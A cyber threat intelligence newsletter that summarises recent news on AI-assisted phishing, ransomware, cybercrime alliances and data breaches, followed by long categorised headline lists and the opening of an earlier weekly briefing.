Classic phishing methods such as credential theft and vendor impersonation are resurging because AI makes personalisation easy. Generative tools remove the grammatical errors that once revealed scams, allowing criminals to adapt tone and context for each target. Deepfakes and voice cloning add realism to social engineering, while business email compromise continues to succeed without malware. Human awareness and layered verification are essential as AI amplifies the effectiveness of old techniques.

Source: https://securityboulevard.com/2025/10/the-phishing-renaissance-how-ai-brought-back-the-classics/

‘Data Sprawl’ Is Now Your Security Team’s Biggest Headache – And It’s Only Going to Get Worse

The growth of data across cloud, hybrid and SaaS environments is overwhelming security teams. One-third of UK organisations saw data volumes surge by 30% or more in the past year and 41% of large enterprises now manage over a petabyte. Around 38% flag redundant or abandoned data as a security risk, while 85% of organisations globally report data loss incidents. The rise of generative AI and weak visibility are exacerbating the issue, and firms should embed privacy-by-design and governance before attackers exploit the chaos.

Source: https://www.itpro.com/security/data-sprawl-is-now-your-security-teams-biggest-headache-and-its-only-going-to-get-worse

Old Threats, New Consequences: 90% of Cyber Claims Stem from Email and Remote Access

Insurance data shows that most cyber claims originate from email and remote access breaches. Email accounted for 43% of incidents in 2024, with claim frequency rising 30% year on year. Fraud often begins with inbox compromise or near-lookalike domains, and average illicit transfers reached $286,000. Generative AI is accelerating attacker success, highlighting that familiar entry points remain the most costly for organisations.

Source: https://www.csoonline.com/article/4081506/old-threats-new-consequences-90-of-cyber-claims-stem-from-email-and-remote-access.html

Survey: Organisations are Too Confident in Their Cyber Resiliency

A global study of 1,773 leaders finds widespread overconfidence in cyber resilience. While 95% believe they can recover from ransomware, 40% were attacked in the past year and only 15% fully restored their data. 45% paid ransoms, with 30% paying over $250,000. 44% report deepfake enabled attacks and many lack clear policies on generative AI. The findings reveal a gap between perceived and actual preparedness.

Source: https://securityboulevard.com/2025/11/survey-organizations-are-too-confident-in-their-cyber-resiliency/

Thousands Fall Victim to Ransomware as European Attacks Reach Record Highs - Here’s Why They’re So at Risk

Europe now accounts for almost 22% of global victims posted on leak sites since 2024, with more than 2,100 European organisations listed. Exposure is driven by lucrative sectors, GDPR penalties that can encourage payment and geopolitical spillover from the war in Ukraine. Average time from initial access to deployment is 35.5 hours, compressing response windows and increasing operational impact. Intelligence led defence and faster containment are essential.

Source: https://www.techradar.com/pro/security/thousands-fall-victim-to-ransomware-as-european-attacks-reach-record-highs-heres-why-theyre-so-at-risk

How Ransomware Attacks Leverage Cyber Insurance Policies

Attackers increasingly search for cyber insurance documents to shape negotiations. Knowledge of limits, coverage and approved vendors allows demands that appear reasonable relative to downtime and costs. Policies should be protected like confidential financial records, with strict access, secure storage, offline copies and staff awareness to prevent leverage during extortion.

Source: https://securityboulevard.com/2025/11/how-ransomware-attacks-leverage-cyber-insurance-policies/

Violent Cybercrime Surges in Europe Amid Big Payouts

Some cyber attackers are pairing online extortion with real world intimidation to force payment. Rising revenues and professionalisation are driving aggression, with threats extending beyond data leaks. Response plans should include physical safety considerations and coordination with law enforcement as pressure tactics escalate.

Source: https://www.theregister.com/2025/11/04/cybercriminals_increasingly_rely_on_violence/

Three of the Biggest Cybercrime Gangs Around Appear to Be Teaming Up - Which Could Be Bad News for All of Us

Scattered Spider, Lapsus$ and ShinyHunters have reportedly united under the new banner “Scattered Lapsus$ Hunters” (SLH). Operating via Telegram, the alliance combines social engineering, credential theft and data-leak extortion into a professionalised “Extortion-as-a-Service” model. The groups seek both profit and notoriety, marking a shift toward cybercrime branding that increases visibility and risk for global enterprises.

Source: https://www.techradar.com/pro/security/three-of-the-biggest-cybercrime-gangs-around-appear-to-be-teaming-up-which-could-be-bad-news-for-all-of-us

Google Says 2026 Will Be the Year AI Supercharges Cybercrime

Google forecasts that by 2026, AI will drive both attacks and defences. Adversaries will automate phishing, deepfakes and prompt injection exploits against large language models. A growing concern is unmonitored bots or scripts with system access that act without oversight; these hidden identities could move data or perform actions unseen by security teams. The report urges strict control, identity tracking and AI-led containment to counter this evolving threat.

Source: https://www.helpnetsecurity.com/2025/11/05/google-cybersecurity-forecast-2026/

Enterprises are Losing Track of the Devices Inside Their Networks

A study of 10 million devices across more than 700 organisations shows that two-thirds are not traditional IT assets such as servers or laptops. Instead, they include extended IoT devices like VoIP phones, cameras, point-of-sale systems and power supplies. On average, firms manage 164 device types, 1,629 vendors and 876 OS versions. With 40% of cameras containing known flaws and 3% exposed online, organisations must urgently regain visibility and control over every connected device.

Source: https://www.helpnetsecurity.com/2025/11/06/enterprise-xiot-devices-risk/

Britain ‘Highly Vulnerable’ to Russian Cyber Attacks, Warns Former Army Chief

Field Marshal Lord Houghton warns that Britain’s cyber defences are not yet fit for purpose and that the nation remains highly vulnerable to hostile cyber activity. Recent breaches affecting the Ministry of Defence and major contractors highlight deep weaknesses. He urges greater investment in AI and autonomous systems to boost military capability and calls for closer coordination between government, industry and the Armed Forces to strengthen resilience.

Source: https://www.telegraph.co.uk/news/2025/11/06/british-army-russian-attack-field-marshal-lord-houghton/



Threats

Ransomware, Extortion and Destructive Attacks

Three of the biggest cybercrime gangs around appear to be teaming up - which could be bad news for all of us | TechRadar

Three Infamous Cybercriminal Groups Form a New Alliance Dubbed 'Scattered LAPSUS$ Hunters' - Cyber Security News

When cyber professionals go rogue: A former ‘ransomware negotiator’ has been charged amid claims they attacked and extorted businesses | IT Pro

Cyber loot flows to Russia and its friends | Cybernews

What Makes Ransomware Groups Successful?

Rhysida ransomware exploits Microsoft certificate to slip malware past defenses | CSO Online

Cybersecurity experts charged with running BlackCat ransomware operation | CSO Online

Ransomware attacks are hitting European enterprises at record pace | IT Pro

Thousands fall victim to ransomware as European attacks reach record highs - here's why they're so at risk | TechRadar

New Beast Ransomware Actively Scans for Active SMB Port from Breached System to Spread Across Network

Leak Site Ransomware Victims Spike 13% in a Year - Infosecurity Magazine

Beware - ransomware gang is tricking victims with fake Microsoft Teams ads | TechRadar

How Ransomware Attacks Leverage Cyber Insurance Policies - Security Boulevard

DragonForce Cartel Emerges as Conti-Derived Ransomware Threat - Infosecurity Magazine

U.S. Sanctions 10 North Korean Entities for Laundering $12.7M in Crypto and IT Fraud

Vibe-Coded Malicious VS Code Extension Found with Built-In Ransomware Capabilities

Old Linux Kernel flaw CVE-2024-1086 resurfaces in ransomware attacks

Ongoing Ransomware Attacks Exploit Linux Vulnerability, CISA Warns

Wipers from Russia’s most cut-throat hackers rain destruction on Ukraine - Ars Technica

Ukrainian allegedly involved in Conti ransomware attacks faces up to 25 years in jail | CyberScoop

Alleged Conti ransomware gang affiliate appears in Tennessee court after Ireland extradition | The Record from Recorded Future News

Ransomware Victims

Conduent January 2025 breach impacts 10M+ people

M&S cyberattack cost £136m but retailer ‘regaining momentum’ | News | The Grocer

Results: Cyber attack more than halved M&S first half profits - Retail Gazette

Hackers hit a Swiss bank, claiming 2.5TB of data | Cybernews

‘People have had to move house’: Inside the British Library, two years on from devastating cyber attack | The Independent

Qantas' digital and customer head steps down months after cyber breach, internal memo shows | Reuters

Knee-jerk corporate responses to data leaks protect brands like Qantas — but consumers are getting screwed

How a ransomware gang encrypted Nevada government's systems

Nevada Refused to Pay Cyberattack Ransom as Systems Sat Compromised for Months – DataBreaches.Net

Hackers threaten to leak data after breaching University of Pennsylvania to send mass emails | TechCrunch

Japanese retailer Askul confirms data leak after cyberattack claimed by Russia-linked group | The Record from Recorded Future News

Apache OpenOffice disputes data breach claims by ransomware gang

"Pay up or we share the tapes": Hackers target massage parlour clients in blackmail scheme

Oncology Institute Reports Cybersecurity Incident Impact - TipRanks.com

Phishing & Email Based Attacks

The Phishing Renaissance, How AI Brought Back the Classics - Security Boulevard

Old threats, new consequences: 90% of cyber claims stem from email and remote access | CSO Online

New phishing scam on LinkedIn is using fake board offers to steal corporate credentials: here's how | Mint

ClickFix malware attacks evolve with multi-OS support, video tutorials

How Phishing Kits Are Evading Detection & Ways to Beat Them | MSSP Alert

Is your business prepared for these growing phishing scams? | TechRadar

“I Paid Twice” Phishing Campaign Targets Booking.com - Infosecurity Magazine

Other Social Engineering

New phishing scam on LinkedIn is using fake board offers to steal corporate credentials: here's how | Mint

ClickFix malware attacks evolve with multi-OS support, video tutorials

In an AI World, Every Attack is a Social Engineering Attack - Security Boulevard

Is your business ready for a deepfake attack? 4 steps to take before it's too late | ZDNET

Cybercriminals have built a business on YouTube’s blind spots - Help Net Security

UK carriers to block spoofed phone numbers in fraud crackdown

SMS Fraud Losses Set to Decline 11% in 2026 - Infosecurity Magazine

Sora 2 Creates Believable Videos, Reality Checks Needed

AI makes holiday shopping scams harder to spot - BetaNews

Microsoft Warns of 'Payroll Pirates' Hijacking HR SaaS Accounts to Steal Employee Salaries

Fraud, Scams and Financial Crime

Europe's phone networks are drowning in fake calls - Help Net Security

Google Report Reveals How Text Scams Steal Your Data And Money

Cybercriminals have built a business on YouTube’s blind spots - Help Net Security

UK carriers to block spoofed phone numbers in fraud crackdown

SMS Fraud Losses Set to Decline 11% in 2026 - Infosecurity Magazine

AI makes holiday shopping scams harder to spot - BetaNews

Microsoft Warns of 'Payroll Pirates' Hijacking HR SaaS Accounts to Steal Employee Salaries

Experts warn AI tools are fueling a rise in scams targeting older adults - BetaNews

Artificial Intelligence

The Phishing Renaissance, How AI Brought Back the Classics - Security Boulevard

Ransomware Attacks on European Organizations Surge as Hackers Leverage AI Tools for Attacks

Google says 2026 will be the year AI supercharges cybercrime - Help Net Security

Cybercrime To Hit Critical Supply Chains As AI Amplifies Global Risk, Google Warns | Scoop News

Cybercriminals Armed With AI Often Find Mid-Sized Businesses Are Sitting Ducks | Law.com

Enterprises are not prepared for a world of malicious AI agents | ZDNET

List of AI Tools Promoted by Threat Actors in Underground Forums and Their Capabilities

In an AI World, Every Attack is a Social Engineering Attack - Security Boulevard

Is your business ready for a deepfake attack? 4 steps to take before it's too late | ZDNET

Google uncovers malware using LLMs to operate and evade detection - Help Net Security

Malware Now Uses AI During Execution to Mutate and Collect Data, Google Warns - SecurityWeek

Researchers Find ChatGPT Vulnerabilities That Let Attackers Trick AI Into Leaking Data

The cottage industry quietly manipulating chatbots’ replies

Sora 2 Creates Believable Videos, Reality Checks Needed

Vibe-Coded Malicious VS Code Extension Found with Built-In Ransomware Capabilities

Tech groups step up efforts to solve AI’s big security flaw

Microsoft Detects "SesameOp" Backdoor Using OpenAI's API as a Stealth Command Channel

Claude Desktop Extensions Vulnerable to Web-Based Prompt Injection - Infosecurity Magazine

Microsoft: A key OpenAI API is being used for 'espionage' by bad actors | Mashable

AI makes holiday shopping scams harder to spot - BetaNews

Google Threat Report Links AI-powered Malware to DPRK Crypto Theft - Decrypt

Researchers claim ChatGPT has a whole host of worrying security flaws - here's what they found | TechRadar

Malware

Google uncovers malware using LLMs to operate and evade detection - Help Net Security

New malware uses AI to adapt during attacks, report finds | The Record from Recorded Future News

ClickFix malware attacks evolve with multi-OS support, video tutorials

Weaponized Putty and Teams Ads Deliver Malware Allowing Hackers to Access Network

Chinese APT Uses 'Airstalk' Malware in Supply Chain Attacks - SecurityWeek

Russian hackers abuse Hyper-V to hide malware in Linux VMs

Rhysida ransomware exploits Microsoft certificate to slip malware past defenses | CSO Online

Australia warns of BadCandy infections on unpatched Cisco devices

Malicious packages in npm evade dependency detection through invisible URL links: Report | CSO Online

Fake Solidity VSCode extension on Open VSX backdoors developers

Gootloader malware is back with new tricks after 7-month break

Millions of developers could be open to attack after critical flaw exploited - here's what we know | TechRadar

Operation SkyCloak Deploys Tor-Enabled OpenSSH Backdoor Targeting Defense Sectors

Russia arrests three suspected Meduza infostealer devs • The Register

Alleged Meduza Stealer malware admins arrested after hacking Russian org

New HttpTroy Backdoor Poses as VPN Invoice in Targeted Cyberattack on South Korea

Russian hackers hit Windows machines via Linux VMs with new custom malware | TechRadar

37 years ago this week, the Morris worm infected 10% of the Internet within 24 hours — worm slithered out and sparked a new era in cybersecurity | Tom's Hardware

Mobile

Europe's phone networks are drowning in fake calls - Help Net Security

Google Report Reveals How Text Scams Steal Your Data And Money

Android Malware Mutes Alerts, Drains Crypto Wallets

Backdoored ‘secure’ messaging app leads to more arrests • The Register

Report finds 67% surge in Android mal... - Mobile World Live

Malicious Android apps on Google Play downloaded 42 million times

Xi Jinping jokes about backdoors in Xiaomi smartphones • The Register

Denial of Service/DoS/DDoS

Hacktivist-Driven DDoS Dominates Attacks on Public Sector - Infosecurity Magazine

Internet of Things – IoT

The Hidden Risks of Third-Party IoT Devices: What Organizations Need t - Infosecurity Magazine

Why millions of connected vehicles need automated cyber security | TechRadar

Enterprises are losing track of the devices inside their networks - Help Net Security

An 18-Year-Old Codebase Left Smart Buildings Wide Open

Connected devices may face mandatory security checks before you can use them

Data Breaches/Leaks

82 percent of finserv organizations suffered a data breach in the last year - BetaNews

Researchers Find ChatGPT Vulnerabilities That Let Attackers Trick AI Into Leaking Data

Conduent January 2025 breach impacts 10M+ people

Hackers hit a Swiss bank, claiming 2.5TB of data | Cybernews

SonicWall Confirms State-Sponsored Hackers Behind September Cloud Backup Breach

‘People have had to move house’: Inside the British Library, two years on from devastating cyber attack | The Independent

Qantas' digital and customer head steps down months after cyber breach, internal memo shows | Reuters

Knee-jerk corporate responses to data leaks protect brands like Qantas — but consumers are getting screwed

Court reimposes original sentence for Capital One hacker | CyberScoop

Lawmakers say stolen police logins are exposing Flock surveillance cameras to hackers | TechCrunch

How the F5 breach, CISA job cuts, and a government shutdown are eroding U.S. cyber readiness | CyberScoop

Washington Post says it is among victims of cyber breach tied to Oracle software | Reuters

Software dev accidentally leaks Australian govt documents | Information Age | ACS

Data breach at major Swedish software supplier impacts 1.5 million

Data breach costs lead to 90% drop in operating profit at South Korean telecom giant | The Record from Recorded Future News

US Congressional Budget Office hit by cybersecurity incident | Reuters

Japanese retailer Askul confirms data leak after cyberattack claimed by Russia-linked group | The Record from Recorded Future News

Apache OpenOffice disputes data breach claims by ransomware gang

Media giant Nikkei reports data breach impacting 17,000 people

Hyundai AutoEver America data breach exposes SSNs, drivers licenses

Organised Crime & Criminal Actors

Three Infamous Cybercriminal Groups Form a New Alliance Dubbed 'Scattered LAPSUS$ Hunters' - Cyber Security News

Scattered Spider, ShinyHunters and LAPSUS$ Form Unified Collective - Infosecurity Magazine

DragonForce Cartel Emerges as Conti-Derived Ransomware Threat - Infosecurity Magazine

‘Scamming became the new farming’: inside India’s cybercrime villages | Cybercrime | The Guardian

Cyber surveillance of British businesses | Professional Security Magazine

Operation Chargeback Uncovers €300m Fraud Scheme in 193 Countries - Infosecurity Magazine

EU Parliament committee votes to advance controversial Europol data sharing proposal | The Record from Recorded Future News

Court reimposes original sentence for Capital One hacker | CyberScoop

Nine Arrested in €600M crypto laundering bust across Europe

Should We Celebrate the UN Convention against Cybercrime? Lessons from the UN Convention against Transnational Crime - Opinio Juris

Russia arrests three suspected Meduza infostealer devs • The Register

Alleged Meduza Stealer malware admins arrested after hacking Russian org

Firms at risk as Japan struggles to keep up with cybercrime amid rise of ransomware - The Mainichi

US Refuses to Sign UN Cybercrime Treaty

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

Operation Chargeback Uncovers €300m Fraud Scheme in 193 Countries - Infosecurity Magazine

18 arrested in €300 million global credit card fraud scheme - Help Net Security

Android Malware Mutes Alerts, Drains Crypto Wallets

Hacker steals over $120 million from Balancer DeFi crypto protocol

Nine Arrested in €600M crypto laundering bust across Europe

Google Threat Report Links AI-powered Malware to DPRK Crypto Theft - Decrypt

Insider Risk and Insider Threats

Employees keep finding new ways around company access controls - Help Net Security

Insurance

How Ransomware Attacks Leverage Cyber Insurance Policies - Security Boulevard

Is cyber on the verge of becoming uninsurable? | Insurance Business America

Supply Chain and Third Parties

Cybercrime To Hit Critical Supply Chains As AI Amplifies Global Risk, Google Warns | Scoop News

Chinese APT Uses 'Airstalk' Malware in Supply Chain Attacks - SecurityWeek

Nation-State Hackers Deploy New Airstalk Malware in Suspected Supply Chain Attack

Washington Post says it is among victims of cyber breach tied to Oracle software | Reuters

Software dev accidentally leaks Australian govt documents | Information Age | ACS

Data breach at major Swedish software supplier impacts 1.5 million

Open VSX rotates access tokens used in supply-chain malware attack

Software Supply Chain

Millions of developers could be open to attack after critical flaw exploited - here's what we know | TechRadar

Malicious packages in npm evade dependency detection through invisible URL links: Report | CSO Online

Cloud/SaaS

SonicWall Confirms State-Sponsored Hackers Behind September Cloud Backup Breach

Microsoft Warns of 'Payroll Pirates' Hijacking HR SaaS Accounts to Steal Employee Salaries

Microsoft Teams really could be bad for your (security) health - hackers spoof bosses, send fake messages, and more | TechRadar

Researchers Just Revealed 4 Big Microsoft Teams Vulnerabilities

With each cloud outage, calls for government action grow louder  | CyberScoop

EU and UK organizations ponder resilience after Azure outage • The Register

Hackers Exploit OneDrive.exe Through DLL Sideloading to Execute Arbitrary Code

UK accused of being too slow to regulate cloud services providers

Oracle’s cloud strategy an increasingly risky bet | CIO

Outages

EU and UK organizations ponder resilience after Azure outage • The Register

Cloudflare’s new report exposes how the global internet still crumbles under fires, earthquakes, politics, and sheer bad luck | TechRadar

With each cloud outage, calls for government action grow louder  | CyberScoop

Identity and Access Management

Employees keep finding new ways around company access controls - Help Net Security

Linux and Open Source

Russian hackers abuse Hyper-V to hide malware in Linux VMs

Ongoing Ransomware Attacks Exploit Linux Vulnerability, CISA Warns

International Criminal Court dumps Microsoft Office • The Register

Old Linux Kernel flaw CVE-2024-1086 resurfaces in ransomware attacks

Logging in as root on Linux? Here's why that's a disaster waiting to happen | ZDNET

Passwords, Credential Stuffing & Brute Force Attacks

The Louvre’s video surveillance had a shockingly weak password | Cybernews

Have I Been Pwned adds a billion new passwords to its database - gHacks Tech News

The Worst Password Of 2025 Is '123456' - Make Sure You Don't Use These

What are the most common passwords? No surprises here • The Register

Social Media

New phishing scam on LinkedIn is using fake board offers to steal corporate credentials: here's how | Mint

Cybercriminals have built a business on YouTube’s blind spots - Help Net Security

Malvertising

Beware - ransomware gang is tricking victims with fake Microsoft Teams ads | TechRadar

Weaponized Putty and Teams Ads Deliver Malware Allowing Hackers to Access Network

Training, Education and Awareness

What keeps phishing training from fading over time - Help Net Security

Study concludes cybersecurity training doesn’t work | KPBS Public Media

Regulations, Fines and Legislation

EU Parliament committee votes to advance controversial Europol data sharing proposal | The Record from Recorded Future News

U.S. Sanctions 10 North Korean Entities for Laundering $12.7M in Crypto and IT Fraud

Report: 36% of companies do not know whether they are covered by NIS2 directive

Cyber Resilience Act: Overview for affected companies

With each cloud outage, calls for government action grow louder  | CyberScoop

Should We Celebrate the UN Convention against Cybercrime? Lessons from the UN Convention against Transnational Crime - Opinio Juris

Connected devices may face mandatory security checks before you can use them

The US must not endorse Russia and China’s vision for cybersecurity

UK accused of being too slow to regulate cloud services providers

US Refuses to Sign UN Cybercrime Treaty

How the F5 breach, CISA job cuts, and a government shutdown are eroding U.S. cyber readiness | CyberScoop

Trump admin begins developing new cybersecurity strategy

Senate approves new leader for Army Cyber Command - Breaking Defense

Securing critical infrastructure: Why Europe’s risk-based regulations matter | Microsoft Security Blog

Old privacy laws create new risks for businesses - Help Net Security

Models, Frameworks and Standards

Report: 36% of companies do not know whether they are covered by NIS2 directive

Cyber Resilience Act: Overview for affected companies

Old privacy laws create new risks for businesses - Help Net Security

Data Protection

Old privacy laws create new risks for businesses - Help Net Security

‘Data sprawl’ is now your security team’s biggest headache – and it’s only going to get worse | IT Pro

Careers, Working in Cyber and Information Security

I was led down the wrong path into cybercrime as a teenager. Here’s what I would tell my younger self | From Play To Purpose | The Guardian

To maximize their influence, CISOs need diverse skills | TechTarget

'We're protecting UK from paralysing attack - and our salaries can be limitless' | Money News | Sky News

Starting Over in Cybersecurity: Advice I Wish I'd Had

Law Enforcement Action and Take Downs

EU Parliament committee votes to advance controversial Europol data sharing proposal | The Record from Recorded Future News

Operation Chargeback Uncovers €300m Fraud Scheme in 193 Countries - Infosecurity Magazine

Europe's phone networks are drowning in fake calls - Help Net Security

Backdoored ‘secure’ messaging app leads to more arrests • The Register

US cybersecurity experts indicted for BlackCat ransomware attacks

Nine Arrested in €600M crypto laundering bust across Europe

Court reimposes original sentence for Capital One hacker  | CyberScoop

Ukrainian allegedly involved in Conti ransomware attacks faces up to 25 years in jail | CyberScoop

Alleged Conti ransomware gang affiliate appears in Tennessee court after Ireland extradition | The Record from Recorded Future News

US Refuses to Sign UN Cybercrime Treaty

Russia arrests three suspected Meduza infostealer devs • The Register

Alleged Meduza Stealer malware admins arrested after hacking Russian org

Misinformation, Disinformation and Propaganda

The cottage industry quietly manipulating chatbots’ replies

Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

Russia-linked 'Curly COMrades' turn to malicious virtual machines for digital spy campaigns | The Record from Recorded Future News

From hackers to tech companies: IHL and the involvement of civilians in ICT activities in armed conflict

Electronic Weapons: Russian Cyber War Against Germany

How nations build and defend their cyberspace capabilities - Help Net Security

Beyond Denial: Toward a Credible Cyber Deterrence Strategy • Stimson Center

Cyber-espionage campaign mirroring Sandworm TTPs hit Russian and Belarusian military - Help Net Security

Nation State Actors

SonicWall Confirms State-Sponsored Hackers Behind September Cloud Backup Breach

Cyber Physical Systems Face Rising Geopolitical Risks

China

Cyber loot flows to Russia and its friends | Cybernews

The US must not endorse Russia and China’s vision for cybersecurity

Chinese APT Uses 'Airstalk' Malware in Supply Chain Attacks - SecurityWeek

Nation-State Hackers Deploy New Airstalk Malware in Suspected Supply Chain Attack

Xi Jinping jokes about backdoors in Xiaomi smartphones • The Register

US telco confirms hackers breached systems in stealthy state-backed cyber campaign – and remained undetected for nearly a year | IT Pro

Chinese hackers scanning, exploiting Cisco ASA firewalls used by governments worldwide | The Record from Recorded Future News

US Space Force to Use Three Weapons To Jam Chinese Satellites Via Remote Control - Bloomberg

Germany Weighs Paying Deutsche Telekom to Replace Huawei Gear - Bloomberg

Finland to Tighten Huawei Ban in 5G Network on Security Grounds - Bloomberg

China-linked hackers exploited Lanscope flaw as a zero-day in attacks

Russia

Think tank finds infrastructure ‘inadequately protected against sabotage and cyber threats’ | New Civil Engineer

Britain ‘highly vulnerable’ to Russian cyber attacks, warns former Army chief

Cyber loot flows to Russia and its friends | Cybernews

Russian hackers hit Windows machines via Linux VMs with new custom malware | TechRadar

The US must not endorse Russia and China’s vision for cybersecurity

Electronic Weapons: Russian Cyber War Against Germany

The cottage industry quietly manipulating chatbots’ replies

Wipers from Russia’s most cut-throat hackers rain destruction on Ukraine - Ars Technica

Russia Wages War On The Internet In Ukraine, But Resistance Is Winning

Ukraine’s Security Service repels over 2,300 enemy cyberattacks in 2025 - Freedom

Offensive Cyber Operations and Combat Effectiveness After Ukraine | Lawfare

NATO's Crossed Swords cyber exercise gets underway in Tallinn | News | ERR

Russia arrests three suspected Meduza infostealer devs • The Register

Alleged Meduza Stealer malware admins arrested after hacking Russian org

Cyber-espionage campaign mirroring Sandworm TTPs hit Russian and Belarusian military - Help Net Security

Iran

UNK_SmudgedSerpent Targets Academics With Political Lures - Infosecurity Magazine

Iran's 'SmudgedSerpent' APT Phishes US Policy Wonks

North Korea

Cyber loot flows to Russia and its friends | Cybernews

U.S. sanctioned North Korea bankers for laundering funds linked to cyberattacks and weapons program

Google Threat Report Links AI-powered Malware to DPRK Crypto Theft - Decrypt

Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence

Nation-State, Cyber and Hacktivist Threats Pummel Europe

Hacktivist-Driven DDoS Dominates Attacks on Public Sector - Infosecurity Magazine

Vulnerability Management

Zombie Projects Rise Again to Undermine Security

Louvre delayed Windows security updates ahead of burglary | CSO Online

UK dept spent £312M moving to Win 10 as support D-day hits • The Register

SolarWinds-Like Risk Lurks in Popular Installer Tool

Vulnerabilities

Researchers Just Revealed 4 Big Microsoft Teams Vulnerabilities

Update Chrome now: 20 security fixes just landed | Malwarebytes

Two Windows vulnerabilities, one a 0-day, are under active exploitation - Ars Technica

New Attack Combines Ghost SPNs and Kerberos Reflection to Elevate Privileges on SMB Servers

Cisco Warns of Hackers Actively Exploiting ASA and FTD 0-day RCE Vulnerability in the Wild

Old Linux Kernel flaw CVE-2024-1086 resurfaces in ransomware attacks

Australia warns of BadCandy infections on unpatched Cisco devices

Windows Graphics Vulnerabilities Allow Remote Attackers to Execute Arbitrary Code

New GDI Flaws Could Enable Remote Code Execution in Windows - Infosecurity Magazine

Android Update Patches Critical Remote Code Execution Flaw - SecurityWeek

Apple Patches Multiple Critical Vulnerabilities in iOS 26.1 and iPadOS 26.1

Cisco Warns of New Firewall Attack Exploiting CVE-2025-20333 and CVE-2025-20362

SolarWinds-Like Risk Lurks in Popular Installer Tool

Ongoing Ransomware Attacks Exploit Linux Vulnerability, CISA Warns

Hackers Exploit OneDrive.exe Through DLL Sideloading to Execute Arbitrary Code

Researchers Find ChatGPT Vulnerabilities That Let Attackers Trick AI Into Leaking Data

Claude Desktop Extensions Vulnerable to Web-Based Prompt Injection - Infosecurity Magazine

Hackers exploit critical auth bypass flaw in JobMonster WordPress theme

Microsoft: Patch for WSUS flaw disabled Windows Server hotpatching

Critical UniFi OS Vulnerability Enables Remote Code Execution Attacks

Microsoft: October Windows updates trigger BitLocker recovery

AMD confirms some Zen 5 CPUs have a worrying security flaw that could put users at risk | TechRadar

Exploited 'Post SMTP' Plugin Flaw Exposes WordPress Sites to Takeover  - SecurityWeek

China-linked hackers exploited Lanscope flaw as a zero-day in attacks

Researchers claim ChatGPT has a whole host of worrying security flaws - here's what they found | TechRadar

Hackers exploit WordPress plugin Post SMTP to hijack admin accounts

Sector Specific

Industry specific threat intelligence reports are available.

Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.

- Automotive
- Construction
- Critical National Infrastructure (CNI)
- Defence & Space
- Education & Academia
- Energy & Utilities
- Estate Agencies
- Financial Services
- FinTech
- Food & Agriculture
- Gaming & Gambling
- Government & Public Sector (including Law Enforcement)
- Health/Medical/Pharma
- Hotels & Hospitality
- Insurance
- Legal
- Manufacturing
- Maritime & Shipping
- Oil, Gas & Mining
- OT, ICS, IIoT, SCADA & Cyber-Physical Systems
- Retail & eCommerce
- Small and Medium Sized Businesses (SMBs)
- Startups
- Telecoms
- Third Sector & Charities
- Transport & Aviation
- Web3

Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Links to external articles are provided for general interest and awareness only. Linking to or reposting external content does not constitute endorsement of or by any organisation, service, or product. We do not control and are not responsible for the content, security, or availability of external websites or links. Full credit is given to the original authors and sources. E&OE.

Black Arrow Admin

Black Arrow Cyber Threat Intelligence Briefing 31 October 2025

Black Arrow Cyber Threat Intelligence Briefing 31 October 2025:

-Ransomware Recovery Perils: 40% of Paying Victims Still Lose Their Data

-Reacting Slowly to a Security Breach Opens up Your Business to More Threats, Report Warns

-SMEs Unprepared to Defend Against Advanced Cyber Threats

-UK Financial Regulator to Focus on Cyber Defence

-The 10 Biggest Issues CISOs and Cyber Teams Face Today

-The Cyber Security Perception Gap: Why Executives and Practitioners See Security Differently

-Shadow AI: One In Four Employees Use Unapproved AI Tools, Research Finds

-LinkedIn Phishing Targets Finance Execs With Fake Board Invites

-Social Engineering: Why the ClickFix Malware Attack Just Won’t Go Away

-New Phishing Attack Using Invisible Characters Hidden in Subject Line

-BT Warns of Soaring Cyber Threats Targeting UK Firms

Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.

Executive Summary

This week, ransomware continues to underline the need for leaders to plan to prevent attacks and manage them effectively if the worst happens, with 40% of paying victims still unable to recover their data. SMEs face rising exposure as cyber criminals exploit weaker controls and limited recovery planning, showing that every organisation must understand its risk profile and response capability.

We see the UK financial regulator strengthening its stance on operational resilience, signalling growing expectations for leadership accountability. Business leaders are reassessing their exposure and security, but with a clear need to ensure perceptions of security reflect reality. Current threats include shadow AI, LinkedIn campaigns targeting executives, persistent malware, advanced phishing, and attackers constantly scanning potential victims for exploitable weaknesses.

These developments reinforce that resilience includes building security and preparing to manage an incident. Contact us to discuss how we help achieve this, including through impartial incident-response simulations that help leaders rehearse and objectively challenge their preparedness.

Top Cyber Stories of the Last Week

Ransomware Recovery Perils: 40% of Paying Victims Still Lose Their Data

A Hiscox survey of SMEs found that two in five organisations that pay ransoms still fail to recover their data. Ransomware attacks remain widespread, with 27% of firms hit in the past year and 80% paying in hopes of restoration. Experts say recovery often fails due to flawed encryption, corrupted backups and untested recovery plans. Paying rarely resolves the full breach, which may include data theft or GDPR implications. Strong preparation, tested backups, insurance and legal readiness are key to resilience.

Source: https://www.csoonline.com/article/4077484/ransomware-recovery-perils-40-of-paying-victims-still-lose-their-data.html

Reacting Slowly to a Security Breach Opens up Your Business to More Threats, Report Warns

Barracuda’s latest research finds most organisations suffered at least one email breach in the past year and slow response hugely increases follow-on risk. The report links delayed containment with higher odds of ransomware and material business disruption, including reputational harm and lost opportunities. Small firms are hit hard as recovery costs scale per employee and teams struggle to detect and triage incidents within an hour. The authors call for quicker detection, automation in response and a unified approach to break entire attack chains rather than point-in-time fixes.

Source: https://www.techradar.com/pro/security/reacting-slowly-to-a-security-breach-opens-up-your-business-to-more-threats-report-warns

SMEs Unprepared to Defend Against Advanced Cyber Threats

Vodafone’s latest report warns that Irish SMEs are struggling to keep pace with AI-driven cyber threats. One in four firms could collapse after a single ransomware attack, and AI-powered scams are expected to drive a 50% rise in attack costs within three years. Only half of SMEs rank cyber security as a top priority, while 69% lack proper safeguards. With attackers cloning voices and creating adaptive malware, Vodafone urges practical defences such as training, multi-factor authentication and partnerships with expert providers.

